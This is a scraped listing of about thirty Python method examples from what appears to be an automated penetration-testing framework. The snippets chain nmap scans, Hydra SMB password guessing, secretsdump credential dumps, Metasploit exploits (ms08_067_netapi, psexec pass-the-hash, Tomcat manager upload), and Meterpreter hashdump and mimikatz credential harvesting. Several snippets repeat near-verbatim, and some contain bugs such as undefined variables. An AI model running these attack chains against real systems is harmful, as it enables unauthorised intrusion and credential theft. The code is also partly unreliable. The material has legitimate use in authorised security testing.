Exemple #1
0
 def processOs(self, host, os):
     osStr = ""
     osStrAcc = 0
     for osmatch in os.findall('osmatch'):
         osStr_tmp = osmatch.attrib['name'] if osmatch.attrib['name'] else ""
         osStrAcc_tmp = osmatch.attrib['accuracy'] if osmatch.attrib[
             'accuracy'] else ""
         if (int(osStrAcc_tmp) > osStrAcc):
             osStrAcc = int(osStrAcc_tmp)
             osStr = osStr_tmp
     osFam = ""
     osGen = ""
     osClassAcc = 0
     for osclass in os.findall('osclass'):
         #            print osclass.attrib['type']
         #            print osclass.attrib['vendor']
         osFam_tmp = osclass.attrib['osfamily'] if osclass.attrib[
             'osfamily'] else ""
         osGen_tmp = osclass.attrib['osgen'] if osclass.attrib[
             'osgen'] else ""
         osClassAcc_tmp = osclass.attrib['accuracy'] if osclass.attrib[
             'accuracy'] else ""
         if (int(osClassAcc_tmp) > osClassAcc):
             osClassAcc = int(osClassAcc_tmp)
             osFam = osFam_tmp
             osGen = osGen_tmp
     kb.add('host/' + host + '/os/' + osFam + ' ' + osGen)
Exemple #2
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        # loop over each target
        for t in self.targets:
            # test for NULL authentication first
            if not self.seentarget(t):
                self.addseentarget(t)
                self.searchTarget(t, '', '', '')

            # test for any local users
            for user in self.getUsers(t):
                passwords = kb.get(['creds/host/' + t + '/username/' + user + '/password'])
                for password in passwords:
                    if not self.seentarget(t + user + password):
                        self.addseentarget(t + user + password)
                        self.searchTarget(t, user, password, "")

            # test for any domain users
            domains = kb.get("host/" + t + "/domain")
            for domain in domains:
                for user in self.getDomainUsers(domain):
                    passwords = kb.get(['creds/domain/' + t + '/username/' + user + '/password'])
                    for password in passwords:
                        if not self.seentarget(t + user + password + domain):
                            self.addseentarget(t + user + password + domain)
                            self.searchTarget(t, user, password, domain)
        return
Exemple #3
0
    def processTarget(self, t, port):
        if not self.seentarget(t + str(port)):
            self.addseentarget(t + str(port))
            self.display.verbose(self.shortName + " - Connecting to " + t)
            try:
                conn = httplib.HTTPConnection(t, port, timeout=10)

                conn.request('GET', '/')
                response = conn.getresponse()
                serverver = response.getheader('server')
                if (serverver):
                    outfile = self.config[
                        "proofsDir"] + self.shortName + "_" + t + "_" + str(
                            port) + "_" + Utils.getRandStr(10)
                    Utils.writeFile(
                        "Identified Server Version of %s : %s\n\nFull Headers:\n%s"
                        %
                        (t, serverver, self.print_dict(response.getheaders())),
                        outfile)
                    kb.add("host/" + t + "/files/" + self.shortName + "/" +
                           outfile.replace("/", "%2F"))

            except httplib.BadStatusLine:
                pass
            # except socket.error as e:
            except:
                pass
Exemple #4
0
    def processService(self, host, port, proto, service):
        name = ""
        product = ""
        version = ""
        for key, value in service.attrib.items():
            if key == 'name':
                name = value
                if "http" in name:
                    if "https" in name:
                        name = "https"
                    elif "ssl" in name:
                        name = "https"
                    else:
                        name = "http"
                original = value
#                print "NMAP -- " + original + " -- " + name
            elif key == 'product':
                product = value
            elif key == 'version':
                version = value
#            elif key == 'ostype':
#                print value
#            elif key == 'method':
#                print value
#            elif key == 'conf':
#                print value
        kb.add('service/' + name + '/' + host + '/' + proto + '/' + port +
               '/version/' + product + ' ' + version)
        EventHandler.fire("newService_" + name + ":" + self.vector)
Exemple #5
0
 def addVuln(self, host, vuln, details={}):
     self.display.error("VULN [%s] Found on [%s]" % (vuln, host))
     kb.add("vuln/host/" + host + "/" + vuln + "/module/" + self.shortName +
            "/" + self.vector)
     for key in details:
         kb.add("vuln/host/" + host + "/" + vuln + "/details/" + key + "/" +
                details[key])
Exemple #6
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        # loop over each target
        for t in self.targets:
            # test for NULL authentication first
            if not self.seentarget(t):
                self.addseentarget(t)
                self.searchTarget(t, '', '', '')

            # test for any local users
            for user in self.getUsers(t):
                passwords = kb.get(
                    ['creds/host/' + t + '/username/' + user + '/password'])
                for password in passwords:
                    if not self.seentarget(t + user + password):
                        self.addseentarget(t + user + password)
                        self.searchTarget(t, user, password, "")

            # test for any domain users
            domains = kb.get("host/" + t + "/domain")
            for domain in domains:
                for user in self.getDomainUsers(domain):
                    passwords = kb.get([
                        'creds/domain/' + t + '/username/' + user + '/password'
                    ])
                    for password in passwords:
                        if not self.seentarget(t + user + password + domain):
                            self.addseentarget(t + user + password + domain)
                            self.searchTarget(t, user, password, domain)
        return
Exemple #7
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        # loop over each target
        for t in self.targets:
            users = kb.get(['host/' + t + '/user'])
            self.display.verbose(self.shortName + " - Connecting to " + t)
            for user in users:
                # verify we have not tested this host before
                if not self.seentarget(t + str(user)):
                    # add the new IP to the already seen list
                    self.addseentarget(t + str(user))

                    passwords = kb.get(['host/' + t + '/user/' + user + '/password'])
                    for password in passwords:
                        self.display.verbose(self.shortName + " - Connecting to " + t)

                        # make outfile
                        temp_file = self.config[
                                        "proofsDir"] + self.shortName + "_" + t + "_" + user + "_" + Utils.getRandStr(
                            10)

                        # run secretesdump.py
                        command = "secretsdump.py -outputfile " + temp_file + " \"" + user + "\":\"" + password + \
                                  "\"@" + t
                        result = Utils.execWait(command, None)

                        # TODO
                        # parse out put and store any new info and fire any additional triggers
        return
Exemple #8
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        # loop over each target
        for t in self.targets:
            users = self.getUsers(t)
            self.display.verbose(self.shortName + " - Connecting to " + t)
            for user in users:
                # verify we have not tested this host before
                if not self.seentarget(t + str(user)):
                    # add the new IP to the already seen list
                    self.addseentarget(t + str(user))
                    # make outfile
                    temp_file = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)

                    command = self.config["hydra"] + " -s 445 -l " + user + " -P " + self.config[
                        "miscDir"] + "passwords.txt smb://" + t
                    result = Utils.execWait(command, temp_file, timeout=30)

                    # Extract usernames & passwords from results and add to KB
                    parts = re.findall(".* login:\s\s*([^\s]*)\s\s*password:\s\s*([^\s]*)", result)
                    for part in parts:
                        self.fire("newSmbPassword")
                        self.addVuln(t, "guessable password", {"output": temp_file.replace("/", "%2F")})

                        self.display.debug(
                            "Identified username [" + part[0] + "] with password [" + part[1] + "] on " + t)
                        kb.add("creds/host/" + t + "/username/" + part[0].strip() + "/password/" + part[1].strip())

        return
Exemple #9
0
    def processService(self, host, port, proto, service):
        name = ""
        product = ""
        version = ""
        for key, value in service.attrib.items():
            if   key == 'name':
                name = value
                if "http" in name:
                    if "https" in name:
                        name = "https"
                    elif "ssl" in name:
                        name = "https"
                    else:
                        name = "http"
                original = value
#                print "NMAP -- " + original + " -- " + name
            elif key == 'product':
                product = value
            elif key == 'version':
                version = value
#            elif key == 'ostype':
#                print value
#            elif key == 'method':
#                print value
#            elif key == 'conf':
#                print value
        kb.add('service/' + name + '/' + host + '/' + proto + '/' + port + '/version/' + product + ' ' + version)
        EventHandler.fire("newService_" + name + ":" + self.vector)
Exemple #10
0
    def processIPs(self, vector):
        for host in self.nm.all_hosts():
            good = False
            for proto in self.nm[host].all_protocols():
                if (good):
                    break
                lport = list(self.nm[host][proto].keys())
                lport.sort()
                for port in lport:
                    if (good):
                        break
                    if (self.nm[host][proto][port]["state"] == "open"):
                        good = True

            if (good):
                kb.add('host/' + host)
                # fire new event for "newHost"
                EventHandler.fire("newIP" + ":" + vector)

                # process ports
                self.processPorts(host, vector)

                # process hostscripts
                if ("hostscript" in self.nm[host]):
                    self.processHostScripts(host, vector)
        return
Exemple #11
0
    def searchTarget(self, target, port, username, password):
        success = False
        # start packet capture
        cap = self.pktCap(filter="tcp and port " + str(port) + " and host " + target, packetcount=10, timeout=10,
                          srcip="", dstip=target)
        try:
            if (Utils.port_open(target, 21)):
                # attempt to connect to the remote host
                with ftputil.FTPHost(target, username, password) as host:
                    success = True
                    # get list of files and loop over them
                    recursive = host.walk("/", topdown=True, onerror=None)
                    for root, dirs, files in recursive:
                        for name in files:
                            for pattern in self.filepatterns:
                                match_list = fnmatch.filter(files, pattern)
                                for fname in match_list:
                                    fpath = host.path.join(root, fname)
                                    if host.path.isfile(fpath):
                                        host.download(fpath, self.config["proofsDir"] + ip + fpath.replace("/", "_"))
                    host.close()
        except ftputil.error.PermanentError:
            self.display.error("Could not connect to %s on port 21" % (target))

        outfile = self.config["proofsDir"] + self.shortName + "_PCAP_Port" + str(
            port) + "_" + target + "_" + Utils.getRandStr(10)
        Utils.writeFile(self.getPktCap(cap), outfile)
        kb.add("host/" + target + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
        return success
Exemple #12
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)

                    comStrings = kb.get("vuln/host/" + t +
                                        "/snmpCred/communityString")
                    for comString in comStrings:
                        cmd = {
                            'config': [
                                "use auxiliary/scanner/snmp/snmp_enumshares",
                                "set RHOSTS %s" % t,
                                "set COMMUNITY %s" % comString
                            ],
                            'payload':
                            'none'
                        }
                        result, outfile = self.msfExec(t, cmds)

                        #  Don't need to parse out IP, we are running module one IP at a time
                        # Just find lines with  -  and pull out share name
                        parts = re.findall(".* - .*", result)
                        for part in parts:
                            sharename = (part.split('-')[0]).strip()
                            kb.add("share/smb/" + t + "/" + sharename)

        return
Exemple #13
0
    def process(self):
        # early out if the osint depth is reached
        if (int(self.getVectorDepth()) > int(self.config['max_osint_depth'])):
            return

        # load any targets we are interested in
        self.getTargets()

        # loop over each target
        for t in self.targets:
            # verify we have not tested this host before
            if not self.seentarget(t):
                # add the to the already seen list
                self.addseentarget(t)
                # make outfile
                temp_file = self.config[
                    "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
                        10)
                result = whois.whois(t)
                address = result['address']
                if address:
                    kb.add("osint/address/" + address)
                emails = result['emails']
                if emails:
                    for email in emails:
                        kb.add("osint/email/" + email)
                Utils.writeFile(str(result), temp_file)
        return
Exemple #14
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        # loop over each target
        for t in self.targets:
            # verify we have not tested this host before
            if not self.seentarget(t):
                # add the new target to the already seen list
                self.addseentarget(t)

                self.display.verbose(self.shortName + " - Targetting " + t)

                # make outfile
                temp_file = self.config[
                    "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
                        10)

                # perform web stie request and parsing
                result = self.search(t)
                for line in result:
                    kb.add("osint/dnsdomain/host/t")
                    self.fire("newHost")

                text = ', '.join(result)
                Utils.writeFile(text, temp_file)

        return
Exemple #15
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)

                    cmd = {
                        'config': [
                            "use exploit/windows/smb/ms08_067_netapi",
                            "set TARGET 0",
                            "set RHOST %s" % t
                        ],
                        'payload':
                        'win'
                    }
                    result, outfile = self.msfExec(t, cmds)

                    parts = re.findall(".*Meterpreter session (\d+) opened.*",
                                       result)
                    for part in parts:
                        self.fire("msfSession")
                        self.display.verbose("NEW session on : " + t)
                        kb.add("hell" + t + "/msf/" + str(part))

        return
Exemple #16
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # loop over each target
            for t in self.targets:
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    cstrings = kb.get("vuln/host/" + t +
                                      "/snmpCred/communityString")
                    for community in cstrings:
                        command = self.config[
                            "snmpwalk"] + " -v 2c -c " + community + " " + t
                        result = command + "\n" + Utils.execWait(
                            command)  #append command to top of output
                        outfile = self.config[
                            "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
                                10)
                        Utils.writeFile(result, outfile)
                        kb.add("host/" + t + "/vuln/snmpCred/output/" +
                               outfile.replace("/", "%2F"))

        return
Exemple #17
0
    def process(self):
        # early out if the osint depth is reached
        if (int(self.getVectorDepth()) <= int(self.config['max_osint_depth'])):
            # load any targets we are interested in
            self.getTargets()

            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the to the already seen list
                    self.addseentarget(t)
                    # make outfile
                    temp_file = self.config[
                        "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
                            10)
                    obj = ipwhois.IPWhois(t)
                    result = obj.lookup_rdap()
                    cidr = result['network']['cidr']
                    if cidr:
                        net = IPNetwork(cidr)
                        added = False
                        for ip in list(net):
                            if not str(ip) in self.targets:
                                kb.add("osint/host/" + str(ip))
                                added = True
                        if added:
                            self.fire("newHost")
                    Utils.writeFile(str(result), temp_file)
        return
Exemple #18
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        # loop over each target
        for t in self.targets:
            # verify we have not tested this host before
            if not self.seentarget(t):
                # add the new IP to the already seen list
                self.addseentarget(t)
                self.display.verbose(self.shortName + " - Connecting to " + t)
                # run nmap
                n = mynmap(self.config, self.display)
                scan_results = n.run(target=t, flags="--script=smb-enum-shares", ports="445", vector=self.vector,
                                     filetag=t + "_SMBSHARESCAN")['scan']

                tree = ET.parse(n.outfile + '.xml')
                root = tree.getroot()
                for table in root.iter('table'):
                    sharename = table.attrib["key"]
                    for elem in table:
                        if elem.text is not None:
                            kb.add("host/" + t + "/shares/SMB/" + sharename + "/" + str(elem.attrib['key'] + ": " + elem.text).replace("/", "%2F"))

        return
Exemple #19
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # loop over each target
            for t in self.targets:
                users = self.getUsers(t)
                for user in users:
                    hashes = kb.get ("creds/host/" + t + "/username/" + user + "/fullhash")
                    for passhash in hashes:
                        # verify we have not tested this host before
                        if not self.seentarget(t+user+passhash):
                            # add the new IP to the already seen list
                            self.addseentarget(t+user+passhash)
                           
                            cmd = {
                                    'config':[
                                            "use exploit/windows/smb/psexec",
                                            "set RPORT 445",
                                            "set RHOST %s" % t,
                                            "set SMBUser %s" % user,
                                            "set SMBPass %s" % passhash
                                        ],
                                    'payload':'win'}
                            result, outfile = self.msfExec(t, cmds)
 
                            parts = re.findall(".*Meterpreter session (\d+) opened.*", result)
                            for part in parts:
                                self.fire("msfSession")
                                self.display.verbose("NEW session on : " + t)
                                kb.add("shell/" + t + "/msf/" + str(part))
        
        return
Exemple #20
0
    def searchTarget(self, target, port, username, password):
        success = False
        # start packet capture
        #        cap = self.pktCap(filter="tcp and port " + str(port) + " and host " + target, packetcount=10, timeout=10,
        #                          srcip="", dstip=target)
        try:
            if (Utils.port_open(target, 21)):
                # attempt to connect to the remote host
                with ftputil.FTPHost(target, username, password) as host:
                    success = True
                    # get list of files and loop over them
                    recursive = host.walk("/", topdown=True, onerror=None)
                    for root, dirs, files in recursive:
                        for name in files:
                            for pattern in self.filepatterns:
                                match_list = fnmatch.filter(files, pattern)
                                for fname in match_list:
                                    fpath = host.path.join(root, fname)
                                    if host.path.isfile(fpath):
                                        host.download(
                                            fpath, self.config["proofsDir"] +
                                            ip + fpath.replace("/", "_"))
                    host.close()
        except ftputil.error.PermanentError:
            self.display.error("Could not connect to %s on port 21" % (target))

#        outfile = self.config["proofsDir"] + self.shortName + "_PCAP_Port" + str(
#            port) + "_" + target + "_" + Utils.getRandStr(10)
#        Utils.writeFile(self.getPktCap(cap), outfile)
        kb.add("host/" + target + "/files/" + self.shortName + "/" +
               outfile.replace("/", "%2F"))
        return success
Exemple #21
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        # loop over each target
        for t in self.targets:
            # verify we have not tested this host before
            if not self.seentarget(t):
                # add the new IP to the already seen list
                self.addseentarget(t)
                self.display.verbose(self.shortName + " - Connecting to " + t)
                # run nmap
                n = mynmap(self.config, self.display)
                scan_results = n.run(target=t,
                                     flags="--script=smb-enum-shares",
                                     ports="445",
                                     vector=self.vector,
                                     filetag=t + "_SMBSHARESCAN")['scan']

                tree = ET.parse(n.outfile + '.xml')
                root = tree.getroot()
                for table in root.iter('table'):
                    sharename = table.attrib["key"]
                    for elem in table:
                        if elem.text is not None:
                            kb.add("host/" + t + "/shares/SMB/" + sharename +
                                   "/" + str(elem.attrib['key'] + ": " +
                                             elem.text).replace("/", "%2F"))

        return
Exemple #22
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        for t in self.targets:
            sessions = kb.get('host/' + t + '/msfSession')

            if len(sessions) > 0:
                # connect to msfrpc
                msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
                            password=self.config['msfpass'])

                if msf.isAuthenticated():
                    # loop over each target
                    for s in sessions:
                        # verify we have not tested this session before
                        if not self.seentarget(s):
                            # add the new IP to the already seen list
                            self.addseentarget(s)
                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("getuid\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("background\n")

                            outfile = self.config[
                                          "proofsDir"] + self.shortName + "_GetUid_" + t + "_" + Utils.getRandStr(
                                10)
                            text = msf.getResult()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
                            for line in text.splitlines():
                                m = re.match(r'^\s*Server username: (.*)\s*', line)
                                if (m):
                                    self.display.verbose("Metasploit Session [" + s +
                                            "] running as user [" + m.group(1).strip() + "]")

                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("sysinfo\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("background\n")

                            outfile = self.config[
                                          "proofsDir"] + self.shortName + "_SysInfo_" + t + "_" + Utils.getRandStr(
                                10)
                            text = msf.getResult()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
                            for line in text.splitlines():
                                m = re.match(r'^\s*OS\s\s*: (.*)\s*', line)
                                if (m):
                                    self.display.verbose("Metasploit Session [" + s +
                                            "] running on OS [" + m.group(1).strip() + "]")

            # clean up after ourselves
            result = msf.cleanup()

        return
Exemple #23
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'],
                        port=int(self.config['msfport']),
                        user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    self.display.verbose(self.shortName + " - Connecting to " +
                                         t)
                    # Get list of working community strings for this host
                    comStrings = kb.get("vuln/host/" + t +
                                        "/snmpCred/communityString")
                    for comString in comStrings:
                        myMsf.lock.acquire()
                        msf.execute(
                            "use auxiliary/scanner/snmp/snmp_enumusers\n")
                        msf.execute("set RHOSTS %s\n" % t)
                        msf.execute("set COMMUNITY %s\n" % comString)
                        msf.execute("exploit\n")
                        msf.sleep(int(self.config['msfexploitdelay']))
                        result = msf.getResult()
                        while (re.search(".*execution completed.*", result) is
                               None):
                            result = result + msf.getResult()
                        myMsf.lock.release()

                        outfile = self.config[
                            "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
                                10)
                        Utils.writeFile(result, outfile)
                        kb.add("host/" + t + "/files/" + self.shortName + "/" +
                               outfile.replace("/", "%2F"))

                        # Extract usernames from results and add to KB
                        parts = re.findall(".* users: .*", result)
                        for part in parts:
                            userlist = (part.split(':')[2]).split(',')
                            for username in userlist:
                                kb.add("creds/host/" + t + "/username/" +
                                       username.strip())

            # clean up after ourselves
            result = msf.cleanup()

        return
Exemple #24
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        for t in self.targets:
            sessions = kb.get('host/' + t + '/msfSession')

            if len(sessions) > 0:
                # connect to msfrpc
                msf = myMsf(host=self.config['msfhost'],
                            port=self.config['msfport'],
                            user=self.config['msfuser'],
                            password=self.config['msfpass'])

                if msf.isAuthenticated():
                    # loop over each target
                    for s in sessions:
                        # verify we have not tested this session before
                        if not self.seentarget(s):
                            # add the new IP to the already seen list
                            self.addseentarget(s)
                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("hashdump\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("background\n")

                            # TODO - process results and store results in KB
                            # regex match on [^:]+:[^:]+:[^:]+:[^:]+:::
                            outfile = self.config[
                                "proofsDir"] + self.shortName + "_HashDump_" + t + "_" + Utils.getRandStr(
                                    10)
                            text = msf.getResult()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName +
                                   "/" + outfile.replace("/", "%2F"))

                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("load mimikatz\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("wdigest\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("background\n")

                            # TODO - process results and store results in KB
                            outfile = self.config[
                                "proofsDir"] + self.shortName + "_Mimikatz_" + t + "_" + Utils.getRandStr(
                                    10)
                            text = msf.getResult()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName +
                                   "/" + outfile.replace("/", "%2F"))

            # clean up after ourselves
            result = msf.cleanup()

        return
Exemple #25
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'],
                        port=int(self.config['msfport']),
                        user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                ports = kb.get('service/http/' + t + '/tcp')
                for p in ports:
                    # verify we have not tested this host before
                    if not self.seentarget(t + p):
                        # add the new IP to the already seen list
                        self.addseentarget(t + p)
                        myMsf.lock.acquire()
                        self.display.verbose(self.shortName +
                                             " - Connecting to " + t)
                        msf.execute(
                            "use auxiliary/scanner/http/tomcat_mgr_login\n")
                        msf.execute("set RHOSTS %s\n" % t)
                        msf.execute("set RPORT %s\n" % p)
                        msf.execute("exploit -j\n")
                        msf.sleep(int(self.config['msfexploitdelay']))

                        outfile = self.config[
                            "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
                                10)
                        result = msf.getResult()
                        myMsf.lock.release()
                        Utils.writeFile(result, outfile)
                        kb.add("host/" + t + "/files/" + self.shortName + "/" +
                               outfile.replace("/", "%2F"))
                        for line in result.splitlines():
                            m = re.match(r'.*Successful: (.*):(.*)', line)
                            if (m):
                                self.display.error("Tomcat on [" + t + ":" +
                                                   p +
                                                   "] has default creds of [" +
                                                   m.group(1).strip() + "]/[" +
                                                   m.group(2).strip() + "]")
                                kb.add("creds/service/tomcat/" + t + "/tcp/" +
                                       p + "/username/" + m.group(1).strip() +
                                       "/password/" + m.group(2).strip())
                                self.fire("newTomcatPassword")

            # clean up after ourselves
            result = msf.cleanup()

        return
Exemple #26
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        for t in self.targets:
            sessions = kb.get('shell/' + t + '/msf')

            if len(sessions) > 0:
                # connect to msfrpc
                msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
                            password=self.config['msfpass'])

                if msf.isAuthenticated():
                    # loop over each target
                    for s in sessions:
                        # verify we have not tested this session before
                        if not self.seentarget(s):
                            # add the new IP to the already seen list
                            self.addseentarget(s)
                            myMsf.lock.acquire()
                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("hashdump\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("background\n")
                            msf.sleep(int(self.config['msfexploitdelay']))

                            # TODO - process results and store results in KB
                            # regex match on [^:]+:[^:]+:[^:]+:[^:]+:::
                            outfile = self.config[
                                          "proofsDir"] + self.shortName + "_HashDump_" + t + "_" + Utils.getRandStr(
                                10)
                            text = msf.getResult()
                            myMsf.lock.release()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))

                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("load mimikatz\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("wdigest\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("background\n")

                            # TODO - process results and store results in KB
                            outfile = self.config[
                                          "proofsDir"] + self.shortName + "_Mimikatz_" + t + "_" + Utils.getRandStr(
                                10)
                            text = msf.getResult()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))

            # clean up after ourselves
            result = msf.cleanup()

        return
Exemple #27
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # If any results are succesful, this will become true and Fire will be called in the end
            callFire = False

            # loop over each target
            for t in self.targets:
                ports = kb.get('service/http/' + t + '/tcp')
                for p in ports:
                    users = kb.get("creds/service/tomcat/" + t + "/tcp/" + p +
                                   "/username")
                    for user in users:
                        passwords = kb.get("creds/service/tomcat/" + t +
                                           "/tcp/" + p + "/username/" + user +
                                           "/password")
                        for password in passwords:
                            # verify we have not tested this host before
                            if not self.seentarget(t + p + user + password):
                                # add the new IP to the already seen list
                                self.addseentarget(t + p + user + password)

                                cmd = {
                                    'config': [
                                        "use exploit/multi/http/tomcat_mgr_upload",
                                        "set RHOST %s" % t,
                                        "set RPORT %s" % p,
                                        "set HTTPUSERNAME %s" % user,
                                        "set HTTPPASSWORD %s" % password,
                                        "set fingerprintcheck false",
                                        "set target 2"
                                    ],
                                    'payload':
                                    'win'
                                }
                                result, outfile = self.msfExec(t, cmds)

                                parts = re.findall(".*Meterpreter session.*",
                                                   result)
                                for part in parts:
                                    callFire = True
                                    self.addVuln(
                                        t, self.shortName, {
                                            "port": p,
                                            "username": user,
                                            "password": password,
                                            "output": outfile.replace(
                                                "/", "%2F")
                                        })

            if callFire:
                self.fire("msfSession")

        return
Exemple #28
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'],
                        port=self.config['msfport'],
                        user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                users = self.getUsers(t)
                for user in users:
                    hashes = kb.get("creds/host/" + t + "/username/" + user +
                                    "/fullhash")
                    for passhash in hashes:
                        # verify we have not tested this host before
                        if not self.seentarget(t + user + passhash):
                            # add the new IP to the already seen list
                            self.addseentarget(t + user + passhash)
                            myMsf.lock.acquire()
                            self.display.verbose(self.shortName +
                                                 " - Connecting to " + t)
                            msf.execute("use exploit/windows/smb/psexec\n")
                            msf.execute("set RPORT 445\n")
                            msf.execute("set RHOST " + t + "\n")
                            msf.execute("set SMBUser " + user + "\n")
                            msf.execute("set SMBPass " + passhash + "\n")
                            msf.execute("exploit -j\n")
                            msf.sleep(int(self.config['msfexploitdelay']))

                            outfile = self.config[
                                "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
                                    10)
                            result = msf.getResult()
                            myMsf.lock.release()
                            Utils.writeFile(result, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName +
                                   "/" + outfile.replace("/", "%2F"))

                            parts = re.findall(
                                ".*Meterpreter session (\d+) opened.*", result)
                            for part in parts:
                                self.fire("msfSession")
                                self.display.verbose("NEW session on : " + t)
                                kb.add("shell/" + t + "/msf/" + str(part))

            # clean up after ourselves
            result = msf.cleanup()

        return
Exemple #29
0
    def process(self, inputfile):
        contents = []
        with open(inputfile, "r") as myfile:
            contents = myfile.readlines()

        for line in contents:
            parts = line.strip().split(':=')
            kb.add("osint/" + parts[0].lower() + "/" + parts[1])
            self.fire("new" + parts[0])
        return
Exemple #30
0
    def process(self, inputfile):
        contents = []
        with open (inputfile, "r") as myfile:
            contents = myfile.readlines()

        for line in contents:
            parts = line.strip().split(':=')
            kb.add("osint/" + parts[0].lower() + "/" + parts[1])
            self.fire("new" + parts[0])
        return
Exemple #31
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'],
                        port=int(self.config['msfport']),
                        user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    self.display.verbose(self.shortName + " - Connecting to " +
                                         t)
                    # Get list of working community strings for this host
                    comStrings = kb.get("host/" + t +
                                        "/vuln/snmpCred/communityString")
                    for comString in comStrings:
                        msf.execute(
                            "use auxiliary/scanner/snmp/snmp_enumshares\n")
                        msf.execute("set RHOSTS %s\n" % t)
                        msf.execute("set COMMUNITY %s\n" % comString)
                        msf.execute("run\n")
                        result = msf.getResult()
                        while (re.search(".*execution completed.*", result) is
                               None):
                            result = result + msf.getResult()

                        outfile = self.config[
                            "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
                                10)
                        Utils.writeFile(result, outfile)
                        kb.add("host/" + t + "/files/" + self.shortName + "/" +
                               outfile.replace("/", "%2F"))

                        #  Don't need to parse out IP, we are running module one IP at a time
                        # Just find lines with  -  and pull out share name
                        parts = re.findall(".* - .*", result)
                        for part in parts:
                            sharename = (part.split('-')[0]).strip()
                            kb.add("host/" + t + "/share/smb/" + sharename)

            # clean up after ourselves
            result = msf.cleanup()

